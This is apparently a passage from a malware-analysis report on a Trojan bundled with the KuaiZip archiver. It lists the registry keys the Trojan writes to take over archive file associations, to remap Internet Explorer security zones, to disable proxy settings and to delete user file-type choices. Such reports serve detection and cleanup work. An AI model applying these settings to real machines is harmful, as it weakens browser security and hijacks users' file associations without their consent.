[HKCR\KuaiZip_FileAsso.Origin\.017]
"(Default)" = "NoAssociate.KZ"
[HKCU\Software\KuaiZip\KuaiZip\Setup\.060]
"set" = "1"
[HKCR\KuaiZip.063\DefaultIcon]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe,0"
[HKCU\Software\KuaiZip\KuaiZip\Setup\.075]
"set" = "1"
[HKCR\KuaiZip.009\DefaultIcon]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe,0"
[HKCR\KuaiZip.017]
"(Default)" = "快压 017 压缩文件"
[HKCR\KuaiZip_FileAsso.Origin\.003]
"(Default)" = "NoAssociate.KZ"
[HKCR\KuaiZip.028]
"(Default)" = "快压 028 压缩文件"
[HKCR\KuaiZip.067\DefaultIcon]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe,0"
[HKCR\KuaiZip_FileAsso.Origin\.tbz]
"(Default)" = "NoAssociate.KZ"
[HKCR\KuaiZip.04\DefaultIcon]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe,0"
[HKCU\Software\KuaiZip\KuaiZip\Setup\.097]
"set" = "1"
[HKCR\.077]
"(Default)" = "KuaiZip.077"
[HKCR\KuaiZip.006\DefaultIcon]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe,0"
[HKCR\.02]
"(Default)" = "KuaiZip.02"
[HKCR\KuaiZip.065\DefaultIcon]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe,0"
[HKCR\.083]
"(Default)" = "KuaiZip.083"
[HKCR\KuaiZip_FileAsso.Origin\.068]
"(Default)" = "NoAssociate.KZ"
[HKCR\KuaiZip.027\DefaultIcon]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe,0"
[HKCR\.016]
"(Default)" = "KuaiZip.016"
[HKCR\.087]
"(Default)" = "KuaiZip.087"
[HKCR\KuaiZip.087\DefaultIcon]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe,0"
[HKCU\Software\KuaiZip\KuaiZip\Setup\.085]
"set" = "1"
[HKCR\KuaiZip.041]
"(Default)" = "快压 041 压缩文件"
[HKCR\KuaiZip_FileAsso.Origin\.065]
"(Default)" = "NoAssociate.KZ"
[HKCR\KuaiZip_FileAsso.Origin\.010]
"(Default)" = "NoAssociate.KZ"
[HKCR\KuaiZip.022\DefaultIcon]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe,0"
[HKCR\KuaiZip_FileAsso.Origin\.047]
"(Default)" = "NoAssociate.KZ"
[HKCR\KuaiZip_FileAsso.Origin\.lzh]
"(Default)" = "NoAssociate.KZ"
[HKCR\.024]
"(Default)" = "KuaiZip.024"
[HKCR\KuaiZip.043]
"(Default)" = "快压 043 压缩文件"
[HKCR\KuaiZip.002\DefaultIcon]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe,0"
[HKCU\Software\KuaiZip\KuaiZip\Setup\.004]
"set" = "1"
[HKCU\Software\KuaiZip\KuaiZip\Setup\.bz2]
"set" = "1"
[HKCR\KuaiZip.054]
"(Default)" = "快压 054 压缩文件"
[HKCR\KuaiZip.079]
"(Default)" = "快压 079 压缩文件"
[HKCR\KuaiZip.090]
"(Default)" = "快压 090 压缩文件"
[HKCU\Software\KuaiZip\KuaiZip\Setup\.02]
"set" = "1"
[HKCR\.kz]
"(Default)" = "KuaiZip.kz"
[HKCR\KuaiZip.060]
"(Default)" = "快压 060 压缩文件"
[HKCR\KuaiZip.084\shell\open\command]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe %1"
[HKCR\KuaiZip.094]
"(Default)" = "快压 094 压缩文件"
[HKCR\KuaiZip.055\DefaultIcon]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe,0"
[HKCR\KuaiZip.057\shell\open\command]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe %1"
[HKCR\KuaiZip.022\shell\open\command]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe %1"
[HKCU\Software\KuaiZip\KuaiZip\Setup\.lzh]
"set" = "1"
[HKCU\Software\KuaiZip\KuaiZip\Setup\.018]
"set" = "1"
[HKCU\Software\KuaiZip\KuaiZip\Setup\.020]
"set" = "1"
[HKCR\.gzip]
"(Default)" = "KuaiZip.gzip"
[HKCR\KuaiZip.002]
"(Default)" = "快压 002 压缩文件"
[HKCR\KuaiZip.018\shell\open\command]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe %1"
[HKCR\KuaiZip.007]
"(Default)" = "快压 007 压缩文件"
[HKCU\Software\KuaiZip\KuaiZip\Setup\.044]
"set" = "1"
[HKCU\Software\KuaiZip\KuaiZip\Setup\.gz]
"set" = "1"
[HKCU\Software\KuaiZip\KuaiZip\Setup\.016]
"set" = "1"
[HKCR\KuaiZip.033]
"(Default)" = "快压 033 压缩文件"
[HKCU\Software\KuaiZip\KuaiZip\Setup\.046]
"set" = "1"
[HKCU\Software\KuaiZip\KuaiZip\Setup\.041]
"set" = "1"
[HKCR\KuaiZip.055\shell\open\command]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe %1"
[HKCU\Software\KuaiZip\KuaiZip\Setup\.003]
"set" = "1"
[HKCR\KuaiZip.058]
"(Default)" = "快压 058 压缩文件"
[HKCR\KuaiZip.088\DefaultIcon]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe,0"
[HKCR\KuaiZip.087]
"(Default)" = "快压 087 压缩文件"
[HKCU\Software\KuaiZip\KuaiZip\Setup\.05]
"set" = "1"
[HKCR\KuaiZip.040\DefaultIcon]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe,0"
[HKCR\KuaiZip.arj\shell\open\command]
"(Default)" = "%Program Files%\¿ìѹ\X86\KuaiZip.exe %1"
The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass" = "1"
The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:
"IntranetName" = "1"
The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
"UNCAsIntranet" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.018]
"Progid"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.019]
"Progid"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.048\UserChoice]
"Progid"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.042\UserChoice]
"Progid"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.044\UserChoice]
"Progid"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.072\UserChoice]
"Progid"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.08]
"Progid"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.047\UserChoice]
"Progid"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.gzip]
"Progid"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.tbz\UserChoice]
"Progid"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.078\UserChoice]
"Progid"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.020\UserChoice]
"Progid"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.015]
"Progid"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.070\UserChoice]
"Progid"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.086]
"Progid"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.059]
"Progid"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.045]
"Progid"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.039]
"Progid"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.jar]
"Progid"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.053]
"Progid"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.035\UserChoice]
"Progid"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.082]
"Progid"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.mou]
"Progid"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.025\UserChoice]
"Progid"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.tar]
"Progid"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.093\UserChoice]
"Progid"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.029\UserChoice]
"Progid"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.022]
"Progid"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.zip]
"Progid"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.021]
"Progid"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.020]
"Progid"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.025]
"Progid"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.036]
"Progid"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.051\UserChoice]
"Progid"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.094]
"Progid"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.arj\UserChoice]
"Progid"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.081]
"Progid"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.033\UserChoice]
"Progid"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.066\UserChoice]
"Progid"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.09]
"Progid"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.rpm\UserChoice]
"Progid"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.kz]
"Progid"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.064]
"Progid"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.009]
"Progid"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.053\UserChoice]
"Progid"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.jar\UserChoice]
"Progid"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.lzh\UserChoice]
"Progid"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.089\UserChoice]
"Progid"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.065]
"Progid"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.068]
"Progid"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.wim\UserChoice]
"Progid"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.002]
"Progid"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.085\UserChoice]
"Progid"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.001\UserChoice]
"Progid"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.091]
"Progid"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.044]
"Progid"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.063\UserChoice]
"Progid"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.062\UserChoice]
"Progid"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.060\UserChoice]
"Progid"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.048]
"Progid"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.036\UserChoice]
"Progid"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.045\UserChoice]
"Progid"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.07]
"Progid"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.041]
"Progid"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.02\UserChoice]
"Progid"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.03\UserChoice]
"Progid"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.083\UserChoice]
"Progid"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.034]
"Progid"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.049\UserChoice]
"Progid"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.052]
"Progid"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.rar\UserChoice]
"Progid"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.098\UserChoice]
"Progid"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.06]
"Progid"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.7z\UserChoice]
"Progid"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.006\UserChoice]
"Progid"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.03]
"Progid"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.08\UserChoice]
"Progid"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.06\UserChoice]
"Progid"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.gzip\UserChoice]
"Progid"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.043\UserChoice]
"Progid"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.01]
"Progid"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.056]
"Progid"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.019\UserChoice]
"Progid"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.071\UserChoice]
"Progid"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.096]
"Progid"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.069\UserChoice]
"Progid"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.049]
"Progid"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.056\UserChoice]
"Progid"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.043]
"Progid"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.011\UserChoice]
"Progid"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.096\UserChoice]
"Progid"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.z\UserChoice]
"Progid"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.012\UserChoice]
"Progid"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.097]
"Progid"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.091\UserChoice]
"Progid"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.074\UserChoice]
"Progid"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.05]
"Progid"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.076]
"Progid"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.008]
"Progid"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.082\UserChoice]
"Progid"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.014\UserChoice]
"Progid"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.090\UserChoice]
"Progid"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.050\UserChoice]
"Progid"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.016\UserChoice]
"Progid"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.029]
"Progid"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.bz2]
"Progid"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.01\UserChoice]
"Progid"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.tgz]
"Progid"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.077]
"Progid"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyServer"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.cab]
"Progid"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.tar\UserChoice]
"Progid"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.092\UserChoice]
"Progid"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.097\UserChoice]
"Progid"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.079\UserChoice]
"Progid"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.006]
"Progid"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.088\UserChoice]
"Progid"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.035]
"Progid"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.059\UserChoice]
"Progid"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.058]
"Progid"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.095]
"Progid"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.040]
"Progid"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.083]
"Progid"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.038\UserChoice]
"Progid"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.069]
"Progid"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.068\UserChoice]
"Progid"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.080\UserChoice]
"Progid"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.057]
"Progid"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.027]
"Progid"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.054]
"Progid"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.055]
"Progid"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.012]
"Progid"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.058\UserChoice]
"Progid"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.004\UserChoice]
"Progid"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.tbz]
"Progid"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.008\UserChoice]
"Progid"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.057\UserChoice]
"Progid"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.071]
"Progid"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.07\UserChoice]
"Progid"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.099]
"Progid"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.064\UserChoice]
"Progid"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.040\UserChoice]
"Progid"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.04\UserChoice]
"Progid"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.075]
"Progid"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.rpm]
"Progid"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.087\UserChoice]
"Progid"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.062]
"Progid"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.037]
"Progid"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.037\UserChoice]
"Progid"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.093]
"Progid"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.099\UserChoice]
"Progid"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.085]
"Progid"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.034\UserChoice]
"Progid"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.090]
"Progid"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.031]
"Progid"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.061]
"Progid"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.027\UserChoice]
"Progid"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.067]
"Progid"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.007\UserChoice]
"Progid"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.022\UserChoice]
"Progid"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.030\UserChoice]
"Progid"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.017\UserChoice]
"Progid"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.003]
"Progid"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.067\UserChoice]
"Progid"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.061\UserChoice]
"Progid"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.arj]
"Progid"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.054\UserChoice]
"Progid"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.cab\UserChoice]
"Progid"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.088]
"Progid"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.wim]
"Progid"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.gz\UserChoice]
"Progid"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.076\UserChoice]
"Progid"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.013]
"Progid"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.094\UserChoice]
"Progid"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.030]
"Progid"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.009\UserChoice]
"Progid"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.kz\UserChoice]
"Progid"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.002\UserChoice]
"Progid"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.032]
"Progid"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.073\UserChoice]
"Progid"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.026]
"Progid"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.070]
"Progid"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.04]
"Progid"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.042]
"Progid"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.086\UserChoice]
"Progid"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.004]
"Progid"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.098]
"Progid"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.zip\UserChoice]
"Progid"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.050]
"Progid"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.7z]
"Progid"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.005\UserChoice]
"Progid"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.038]
"Progid"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.024\UserChoice]
"Progid"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.010]
"Progid"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.bz2\UserChoice]
"Progid"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.084\UserChoice]
"Progid"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.060]
"Progid"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.084]
"Progid"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.021\UserChoice]
"Progid"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.rar]
"Progid"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.063]
"Progid"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.073]
"Progid"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.081\UserChoice]
"Progid"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.032\UserChoice]
"Progid"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.09\UserChoice]
"Progid"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.005]
"Progid"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.z]
"Progid"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.051]
"Progid"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.011]
"Progid"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.079]
"Progid"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.007]
"Progid"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.lzh]
"Progid"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.02]
"Progid"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.013\UserChoice]
"Progid"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.089]
"Progid"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.075\UserChoice]
"Progid"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.095\UserChoice]
"Progid"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.017]
"Progid"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.026\UserChoice]
"Progid"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.003\UserChoice]
"Progid"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.041\UserChoice]
"Progid"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.tgz\UserChoice]
"Progid"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.033]
"Progid"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.047]
"Progid"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.046]
"Progid"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.001]
"Progid"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.031\UserChoice]
"Progid"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.077\UserChoice]
"Progid"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.065\UserChoice]
"Progid"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.078]
"Progid"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.092]
"Progid"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.015\UserChoice]
"Progid"
